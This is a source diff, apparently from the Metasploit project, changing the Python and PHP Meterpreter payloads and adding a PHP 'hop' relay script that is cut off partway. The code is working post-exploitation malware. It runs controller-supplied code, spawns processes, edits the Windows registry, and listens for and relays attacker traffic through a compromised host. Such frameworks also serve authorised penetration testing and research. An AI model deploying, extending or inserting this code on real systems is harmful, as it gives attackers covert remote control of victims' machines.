||||
table_data = table_data[4:]
|
||||
for i in xrange(entries):
|
||||
for i in range(entries):
|
||||
addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
|
||||
ifrow = MIB_IFROW()
|
||||
ifrow.dwIndex = addrrow.dwIndex
|
||||
|
@ -1244,9 +1279,10 @@ def stdapi_registry_close_key(request, response):
|
|||
def stdapi_registry_create_key(request, response):
|
||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
||||
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
|
||||
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
|
||||
res_key = ctypes.c_void_p()
|
||||
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
|
||||
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
|
||||
response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
|
||||
return ERROR_SUCCESS, response
|
||||
return ERROR_FAILURE, response
|
||||
|
@ -1255,18 +1291,20 @@ def stdapi_registry_create_key(request, response):
|
|||
def stdapi_registry_delete_key(request, response):
|
||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
||||
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
|
||||
flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
|
||||
if (flags & DELETE_KEY_FLAG_RECURSIVE):
|
||||
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
|
||||
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key))
|
||||
else:
|
||||
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
|
||||
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
|
||||
return result, response
|
||||
|
||||
@meterpreter.register_function_windll
|
||||
def stdapi_registry_delete_value(request, response):
|
||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
||||
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
|
||||
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
|
||||
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name))
|
||||
return result, response
|
||||
|
||||
@meterpreter.register_function_windll
|
||||
|
@ -1335,9 +1373,10 @@ def stdapi_registry_load_key(request, response):
|
|||
def stdapi_registry_open_key(request, response):
|
||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
||||
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
|
||||
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
|
||||
handle_id = ctypes.c_void_p()
|
||||
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
|
||||
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
|
||||
response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
|
||||
return ERROR_SUCCESS, response
|
||||
return ERROR_FAILURE, response
|
||||
|
@ -1367,24 +1406,26 @@ def stdapi_registry_query_class(request, response):
|
|||
|
||||
@meterpreter.register_function_windll
|
||||
def stdapi_registry_query_value(request, response):
|
||||
REG_SZ = 1
|
||||
REG_DWORD = 4
|
||||
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
|
||||
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
||||
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
|
||||
value_type = ctypes.c_uint32()
|
||||
value_type.value = 0
|
||||
value_data = (ctypes.c_ubyte * 4096)()
|
||||
value_data_sz = ctypes.c_uint32()
|
||||
value_data_sz.value = ctypes.sizeof(value_data)
|
||||
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
|
||||
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
|
||||
if result == ERROR_SUCCESS:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
|
||||
if value_type.value == REG_SZ:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
|
||||
elif value_type.value == REG_DWORD:
|
||||
if value_type.value == winreg.REG_SZ:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE)
|
||||
elif value_type.value == winreg.REG_DWORD:
|
||||
value = value_data[:4]
|
||||
value.reverse()
|
||||
value = ''.join(map(chr, value))
|
||||
if sys.version_info[0] < 3:
|
||||
value = ''.join(map(chr, value))
|
||||
else:
|
||||
value = bytes(value)
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
|
||||
else:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
|
||||
|
@ -1395,9 +1436,10 @@ def stdapi_registry_query_value(request, response):
|
|||
def stdapi_registry_set_value(request, response):
|
||||
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
|
||||
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
||||
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
|
||||
value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
|
||||
value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
|
||||
result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
|
||||
result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
|
||||
return result, response
|
||||
|
||||
@meterpreter.register_function_windll
|
||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -125,6 +125,7 @@ define("TLV_META_TYPE_STRING", (1 << 16));
|
|||
define("TLV_META_TYPE_UINT", (1 << 17));
|
||||
define("TLV_META_TYPE_RAW", (1 << 18));
|
||||
define("TLV_META_TYPE_BOOL", (1 << 19));
|
||||
define("TLV_META_TYPE_QWORD", (1 << 20));
|
||||
define("TLV_META_TYPE_COMPRESSED", (1 << 29));
|
||||
define("TLV_META_TYPE_GROUP", (1 << 30));
|
||||
define("TLV_META_TYPE_COMPLEX", (1 << 31));
|
||||
|
@ -655,6 +656,11 @@ function tlv_pack($tlv) {
|
|||
if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
|
||||
$ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
|
||||
}
|
||||
elseif (($tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
|
||||
$hi = ($tlv['value'] >> 32) & 0xFFFFFFFF;
|
||||
$lo = $tlv['value'] & 0xFFFFFFFF;
|
||||
$ret = pack("NNNN", 8 + 8, $tlv['type'], $hi, $lo);
|
||||
}
|
||||
elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
|
||||
$ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
|
||||
}
|
||||
|
@ -686,10 +692,17 @@ function tlv_unpack($raw_tlv) {
|
|||
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
|
||||
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
|
||||
$tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
|
||||
# PHP 5.5.0 modifed the 'a' unpack format to stop removing the trailing
|
||||
# NULL, so catch that here
|
||||
$tlv['value'] = str_replace("\0", "", $tlv['value']);
|
||||
}
|
||||
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
|
||||
$tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
|
||||
}
|
||||
elseif (($type & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
|
||||
$tlv = unpack("Nlen/Ntype/Nhi/Nlo", substr($raw_tlv, 0, $tlv['len']));
|
||||
$tlv['value'] = $tlv['hi'] << 32 | $tlv['lo'];
|
||||
}
|
||||
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
|
||||
$tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
|
||||
}
|
||||
|
@ -911,7 +924,8 @@ function read($resource, $len=null) {
|
|||
$r = Array($resource);
|
||||
my_print("Calling select to see if there's data on $resource");
|
||||
while (true) {
|
||||
$cnt = stream_select($r, $w=NULL, $e=NULL, 0);
|
||||
$w=NULL;$e=NULL;$t=0;
|
||||
$cnt = stream_select($r, $w, $e, $t);
|
||||
|
||||
# Stream is not ready to read, have to live with what we've gotten
|
||||
# so far
|
||||
|
@ -1147,7 +1161,8 @@ add_reader($msgsock);
|
|||
# Main dispatch loop
|
||||
#
|
||||
$r=$GLOBALS['readers'];
|
||||
while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
|
||||
$w=NULL;$e=NULL;$t=1;
|
||||
while (false !== ($cnt = select($r, $w, $e, $t))) {
|
||||
#my_print(sprintf("Returned from select with %s readers", count($r)));
|
||||
$read_failed = false;
|
||||
for ($i = 0; $i < $cnt; $i++) {
|
||||
|
|
|
@ -1,12 +1,5 @@
|
|||
#!/usr/bin/python
|
||||
import code
|
||||
try:
|
||||
import ctypes
|
||||
except:
|
||||
has_windll = False
|
||||
else:
|
||||
has_windll = hasattr(ctypes, 'windll')
|
||||
|
||||
import os
|
||||
import random
|
||||
import select
|
||||
|
@ -15,10 +8,30 @@ import struct
|
|||
import subprocess
|
||||
import sys
|
||||
import threading
|
||||
import time
|
||||
import traceback
|
||||
|
||||
try:
|
||||
import ctypes
|
||||
except ImportError:
|
||||
has_windll = False
|
||||
else:
|
||||
has_windll = hasattr(ctypes, 'windll')
|
||||
|
||||
if sys.version_info[0] < 3:
|
||||
is_bytes = lambda obj: issubclass(obj.__class__, str)
|
||||
bytes = lambda *args: str(*args[:1])
|
||||
NULL_BYTE = '\x00'
|
||||
else:
|
||||
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
|
||||
str = lambda x: __builtins__['str'](x, 'UTF-8')
|
||||
NULL_BYTE = bytes('\x00', 'UTF-8')
|
||||
|
||||
#
|
||||
# Constants
|
||||
#
|
||||
DEBUGGING = False
|
||||
|
||||
PACKET_TYPE_REQUEST = 0
|
||||
PACKET_TYPE_RESPONSE = 1
|
||||
PACKET_TYPE_PLAIN_REQUEST = 10
|
||||
|
@ -41,6 +54,7 @@ TLV_META_TYPE_STRING = (1 << 16)
|
|||
TLV_META_TYPE_UINT = (1 << 17)
|
||||
TLV_META_TYPE_RAW = (1 << 18)
|
||||
TLV_META_TYPE_BOOL = (1 << 19)
|
||||
TLV_META_TYPE_QWORD = (1 << 20)
|
||||
TLV_META_TYPE_COMPRESSED = (1 << 29)
|
||||
TLV_META_TYPE_GROUP = (1 << 30)
|
||||
TLV_META_TYPE_COMPLEX = (1 << 31)
|
||||
|
@ -100,6 +114,7 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
|
|||
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
|
||||
|
||||
EXPORTED_SYMBOLS = {}
|
||||
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
|
||||
|
||||
def export(symbol):
|
||||
EXPORTED_SYMBOLS[symbol.__name__] = symbol
|
||||
|
@ -107,7 +122,7 @@ def export(symbol):
|
|||
|
||||
def generate_request_id():
|
||||
chars = 'abcdefghijklmnopqrstuvwxyz'
|
||||
return ''.join(random.choice(chars) for x in xrange(32))
|
||||
return ''.join(random.choice(chars) for x in range(32))
|
||||
|
||||
@export
|
||||
def inet_pton(family, address):
|
||||
|
@ -125,25 +140,6 @@ def inet_pton(family, address):
|
|||
return ''.join(map(chr, lpAddress[8:24]))
|
||||
raise Exception('no suitable inet_pton functionality is available')
|
||||
|
||||
@export
|
||||
def packet_get_tlv(pkt, tlv_type):
|
||||
offset = 0
|
||||
while (offset < len(pkt)):
|
||||
tlv = struct.unpack('>II', pkt[offset:offset+8])
|
||||
if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
|
||||
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
|
||||
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||
val = val.split('\x00', 1)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||
val = struct.unpack('>I', val)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
||||
val = bool(struct.unpack('b', val)[0])
|
||||
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||
pass
|
||||
return {'type':tlv[1], 'length':tlv[0], 'value':val}
|
||||
offset += tlv[0]
|
||||
return {}
|
||||
|
||||
@export
|
||||
def packet_enum_tlvs(pkt, tlv_type = None):
|
||||
offset = 0
|
||||
|
@ -152,9 +148,11 @@ def packet_enum_tlvs(pkt, tlv_type = None):
|
|||
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
|
||||
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
|
||||
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||
val = val.split('\x00', 1)[0]
|
||||
val = str(val.split(NULL_BYTE, 1)[0])
|
||||
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||
val = struct.unpack('>I', val)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
|
||||
val = struct.unpack('>Q', val)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
||||
val = bool(struct.unpack('b', val)[0])
|
||||
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||
|
@ -163,6 +161,14 @@ def packet_enum_tlvs(pkt, tlv_type = None):
|
|||
offset += tlv[0]
|
||||
raise StopIteration()
|
||||
|
||||
@export
|
||||
def packet_get_tlv(pkt, tlv_type):
|
||||
try:
|
||||
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
|
||||
except IndexError:
|
||||
return {}
|
||||
return tlv
|
||||
|
||||
@export
|
||||
def tlv_pack(*args):
|
||||
if len(args) == 2:
|
||||
|
@ -170,20 +176,35 @@ def tlv_pack(*args):
|
|||
else:
|
||||
tlv = args[0]
|
||||
data = ""
|
||||
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||
data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
|
||||
elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||
data = struct.pack('>III', 12, tlv['type'], tlv['value'])
|
||||
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
|
||||
data = struct.pack('>IIQ', 16, tlv['type'], tlv['value'])
|
||||
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
||||
data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
|
||||
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
||||
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
|
||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
||||
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
|
||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
||||
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
|
||||
else:
|
||||
value = tlv['value']
|
||||
if not is_bytes(value):
|
||||
value = bytes(value, 'UTF-8')
|
||||
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
|
||||
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
|
||||
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
|
||||
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
|
||||
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
|
||||
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
|
||||
return data
|
||||
|
||||
#@export
|
||||
class MeterpreterFile(object):
|
||||
def __init__(self, file_obj):
|
||||
self.file_obj = file_obj
|
||||
|
||||
def __getattr__(self, name):
|
||||
return getattr(self.file_obj, name)
|
||||
export(MeterpreterFile)
|
||||
|
||||
#@export
|
||||
class MeterpreterSocket(object):
|
||||
def __init__(self, sock):
|
||||
|
@ -208,11 +229,11 @@ class STDProcessBuffer(threading.Thread):
|
|||
threading.Thread.__init__(self)
|
||||
self.std = std
|
||||
self.is_alive = is_alive
|
||||
self.data = ''
|
||||
self.data = bytes()
|
||||
self.data_lock = threading.RLock()
|
||||
|
||||
def run(self):
|
||||
for byte in iter(lambda: self.std.read(1), ''):
|
||||
for byte in iter(lambda: self.std.read(1), bytes()):
|
||||
self.data_lock.acquire()
|
||||
self.data += byte
|
||||
self.data_lock.release()
|
||||
|
@ -220,15 +241,20 @@ class STDProcessBuffer(threading.Thread):
|
|||
def is_read_ready(self):
|
||||
return len(self.data) != 0
|
||||
|
||||
def read(self, l = None):
|
||||
data = ''
|
||||
def peek(self, l = None):
|
||||
data = bytes()
|
||||
self.data_lock.acquire()
|
||||
if l == None:
|
||||
data = self.data
|
||||
self.data = ''
|
||||
else:
|
||||
data = self.data[0:l]
|
||||
self.data = self.data[l:]
|
||||
self.data_lock.release()
|
||||
return data
|
||||
|
||||
def read(self, l = None):
|
||||
self.data_lock.acquire()
|
||||
data = self.peek(l)
|
||||
self.data = self.data[len(data):]
|
||||
self.data_lock.release()
|
||||
return data
|
||||
|
||||
|
@ -236,12 +262,25 @@ class STDProcessBuffer(threading.Thread):
|
|||
class STDProcess(subprocess.Popen):
|
||||
def __init__(self, *args, **kwargs):
|
||||
subprocess.Popen.__init__(self, *args, **kwargs)
|
||||
self.echo_protection = False
|
||||
|
||||
def start(self):
|
||||
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
|
||||
self.stdout_reader.start()
|
||||
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
|
||||
self.stderr_reader.start()
|
||||
|
||||
def write(self, channel_data):
|
||||
self.stdin.write(channel_data)
|
||||
self.stdin.flush()
|
||||
if self.echo_protection:
|
||||
end_time = time.time() + 0.5
|
||||
out_data = bytes()
|
||||
while (time.time() < end_time) and (out_data != channel_data):
|
||||
if self.stdout_reader.is_read_ready():
|
||||
out_data = self.stdout_reader.peek(len(channel_data))
|
||||
if out_data == channel_data:
|
||||
self.stdout_reader.read(len(channel_data))
|
||||
export(STDProcess)
|
||||
|
||||
class PythonMeterpreter(object):
|
||||
|
@ -251,7 +290,7 @@ class PythonMeterpreter(object):
|
|||
self.channels = {}
|
||||
self.interact_channels = []
|
||||
self.processes = {}
|
||||
for func in filter(lambda x: x.startswith('_core'), dir(self)):
|
||||
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
|
||||
self.extension_functions[func[1:]] = getattr(self, func)
|
||||
self.running = True
|
||||
|
||||
|
@ -265,6 +304,7 @@ class PythonMeterpreter(object):
|
|||
return func
|
||||
|
||||
def add_channel(self, channel):
|
||||
assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
|
||||
idx = 0
|
||||
while idx in self.channels:
|
||||
idx += 1
|
||||
|
@ -286,7 +326,7 @@ class PythonMeterpreter(object):
|
|||
break
|
||||
req_length, req_type = struct.unpack('>II', request)
|
||||
req_length -= 8
|
||||
request = ''
|
||||
request = bytes()
|
||||
while len(request) < req_length:
|
||||
request += self.socket.recv(4096)
|
||||
response = self.create_response(request)
|
||||
|
@ -294,17 +334,17 @@ class PythonMeterpreter(object):
|
|||
else:
|
||||
channels_for_removal = []
|
||||
# iterate over the keys because self.channels could be modified if one is closed
|
||||
channel_ids = self.channels.keys()
|
||||
channel_ids = list(self.channels.keys())
|
||||
for channel_id in channel_ids:
|
||||
channel = self.channels[channel_id]
|
||||
data = ''
|
||||
data = bytes()
|
||||
if isinstance(channel, STDProcess):
|
||||
if not channel_id in self.interact_channels:
|
||||
continue
|
||||
if channel.stdout_reader.is_read_ready():
|
||||
data = channel.stdout_reader.read()
|
||||
elif channel.stderr_reader.is_read_ready():
|
||||
if channel.stderr_reader.is_read_ready():
|
||||
data = channel.stderr_reader.read()
|
||||
elif channel.stdout_reader.is_read_ready():
|
||||
data = channel.stdout_reader.read()
|
||||
elif channel.poll() != None:
|
||||
self.handle_dead_resource_channel(channel_id)
|
||||
elif isinstance(channel, MeterpreterSocketClient):
|
||||
|
@ -312,7 +352,7 @@ class PythonMeterpreter(object):
|
|||
try:
|
||||
d = channel.recv(1)
|
||||
except socket.error:
|
||||
d = ''
|
||||
d = bytes()
|
||||
if len(d) == 0:
|
||||
self.handle_dead_resource_channel(channel_id)
|
||||
break
|
||||
|
@ -357,13 +397,13 @@ class PythonMeterpreter(object):
|
|||
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
|
||||
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
|
||||
return ERROR_FAILURE
|
||||
preloadlib_methods = self.extension_functions.keys()
|
||||
preloadlib_methods = list(self.extension_functions.keys())
|
||||
symbols_for_extensions = {'meterpreter':self}
|
||||
symbols_for_extensions.update(EXPORTED_SYMBOLS)
|
||||
i = code.InteractiveInterpreter(symbols_for_extensions)
|
||||
i.runcode(compile(data_tlv['value'], '', 'exec'))
|
||||
postloadlib_methods = self.extension_functions.keys()
|
||||
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
|
||||
postloadlib_methods = list(self.extension_functions.keys())
|
||||
new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods))
|
||||
for method in new_methods:
|
||||
response += tlv_pack(TLV_TYPE_METHOD, method)
|
||||
return ERROR_SUCCESS, response
|
||||
|
@ -386,10 +426,10 @@ class PythonMeterpreter(object):
|
|||
if channel_id not in self.channels:
|
||||
return ERROR_FAILURE, response
|
||||
channel = self.channels[channel_id]
|
||||
if isinstance(channel, file):
|
||||
channel.close()
|
||||
elif isinstance(channel, subprocess.Popen):
|
||||
if isinstance(channel, subprocess.Popen):
|
||||
channel.kill()
|
||||
elif isinstance(channel, MeterpreterFile):
|
||||
channel.close()
|
||||
elif isinstance(channel, MeterpreterSocket):
|
||||
channel.close()
|
||||
else:
|
||||
|
@ -405,7 +445,7 @@ class PythonMeterpreter(object):
|
|||
return ERROR_FAILURE, response
|
||||
channel = self.channels[channel_id]
|
||||
result = False
|
||||
if isinstance(channel, file):
|
||||
if isinstance(channel, MeterpreterFile):
|
||||
result = channel.tell() >= os.fstat(channel.fileno()).st_size
|
||||
response += tlv_pack(TLV_TYPE_BOOL, result)
|
||||
return ERROR_SUCCESS, response
|
||||
|
@ -432,13 +472,13 @@ class PythonMeterpreter(object):
|
|||
return ERROR_FAILURE, response
|
||||
channel = self.channels[channel_id]
|
||||
data = ''
|
||||
if isinstance(channel, file):
|
||||
data = channel.read(length)
|
||||
elif isinstance(channel, STDProcess):
|
||||
if isinstance(channel, STDProcess):
|
||||
if channel.poll() != None:
|
||||
self.handle_dead_resource_channel(channel_id)
|
||||
if channel.stdout_reader.is_read_ready():
|
||||
data = channel.stdout_reader.read(length)
|
||||
elif isinstance(channel, MeterpreterFile):
|
||||
data = channel.read(length)
|
||||
elif isinstance(channel, MeterpreterSocket):
|
||||
data = channel.recv(length)
|
||||
else:
|
||||
|
@ -454,13 +494,13 @@ class PythonMeterpreter(object):
|
|||
return ERROR_FAILURE, response
|
||||
channel = self.channels[channel_id]
|
||||
l = len(channel_data)
|
||||
if isinstance(channel, file):
|
||||
channel.write(channel_data)
|
||||
elif isinstance(channel, subprocess.Popen):
|
||||
if isinstance(channel, subprocess.Popen):
|
||||
if channel.poll() != None:
|
||||
self.handle_dead_resource_channel(channel_id)
|
||||
return ERROR_FAILURE, response
|
||||
channel.stdin.write(channel_data)
|
||||
channel.write(channel_data)
|
||||
elif isinstance(channel, MeterpreterFile):
|
||||
channel.write(channel_data)
|
||||
elif isinstance(channel, MeterpreterSocket):
|
||||
try:
|
||||
l = channel.send(channel_data)
|
||||
|
@ -485,13 +525,17 @@ class PythonMeterpreter(object):
|
|||
if handler_name in self.extension_functions:
|
||||
handler = self.extension_functions[handler_name]
|
||||
try:
|
||||
#print("[*] running method {0}".format(handler_name))
|
||||
if DEBUGGING:
|
||||
print('[*] running method ' + handler_name)
|
||||
result, resp = handler(request, resp)
|
||||
except Exception, err:
|
||||
#print("[-] method {0} resulted in an error".format(handler_name))
|
||||
except Exception:
|
||||
if DEBUGGING:
|
||||
print('[-] method ' + handler_name + ' resulted in an error')
|
||||
traceback.print_exc(file=sys.stderr)
|
||||
result = ERROR_FAILURE
|
||||
else:
|
||||
#print("[-] method {0} was requested but does not exist".format(handler_name))
|
||||
if DEBUGGING:
|
||||
print('[-] method ' + handler_name + ' was requested but does not exist')
|
||||
result = ERROR_FAILURE
|
||||
resp += tlv_pack(TLV_TYPE_RESULT, result)
|
||||
resp = struct.pack('>I', len(resp) + 4) + resp
|
||||
|
@ -499,6 +543,9 @@ class PythonMeterpreter(object):
|
|||
|
||||
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
|
||||
if hasattr(os, 'setsid'):
|
||||
os.setsid()
|
||||
try:
|
||||
os.setsid()
|
||||
except OSError:
|
||||
pass
|
||||
met = PythonMeterpreter(s)
|
||||
met.run()
|
||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -9,24 +9,27 @@ if (is_callable('stream_socket_server')) {
|
|||
$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
|
||||
if (!$srvsock) { die(); }
|
||||
$s = stream_socket_accept($srvsock, -1);
|
||||
fclose($srvsock);
|
||||
$s_type = 'stream';
|
||||
} elseif (is_callable('socket_create_listen')) {
|
||||
$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
|
||||
if (!$res) { die(); }
|
||||
$s = socket_accept($srvsock);
|
||||
socket_close($srvsock);
|
||||
$s_type = 'socket';
|
||||
} elseif (is_callable('socket_create')) {
|
||||
$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
|
||||
$res = socket_bind($srvsock, $ipaddr, $port);
|
||||
if (!$res) { die(); }
|
||||
$s = socket_accept($srvsock);
|
||||
socket_close($srvsock);
|
||||
$s_type = 'socket';
|
||||
} else {
|
||||
die();
|
||||
}
|
||||
if (!$s) { die(); }
|
||||
|
||||
switch ($s_type) {
|
||||
switch ($s_type) {
|
||||
case 'stream': $len = fread($s, 4); break;
|
||||
case 'socket': $len = socket_read($s, 4); break;
|
||||
}
|
||||
|
@ -40,7 +43,7 @@ $len = $a['len'];
|
|||
|
||||
$b = '';
|
||||
while (strlen($b) < $len) {
|
||||
switch ($s_type) {
|
||||
switch ($s_type) {
|
||||
case 'stream': $b .= fread($s, $len-strlen($b)); break;
|
||||
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
|
||||
}
|
||||
|
|
|
@ -0,0 +1,68 @@
|
|||
<?php
|
||||
$magic = 'TzGq';
|
||||
$tempdir = sys_get_temp_dir() . "/hop" . $magic;
|
||||
if(!is_dir($tempdir)){
|
||||
mkdir($tempdir); //make sure it's there
|
||||
}
|
||||
|
||||
//get url
|
||||
$url = $_SERVER["QUERY_STRING"];
|
||||
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
|
||||
|
||||
//Looks for a file with a name or contents prefix, if found, send it and deletes it
|
||||
function findSendDelete($tempdir, $prefix, $one=true){
|
||||
if($dh = opendir($tempdir)){
|
||||
while(($file = readdir($dh)) !== false){
|
||||
if(strpos($file, $prefix) !== 0){
|
||||
continue;
|
||||
}
|
||||
readfile($tempdir."/".$file);
|
||||
unlink($tempdir."/".$file);
|
||||
if($one){
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
//handle control
|
||||
if($url === "/control"){
|
||||
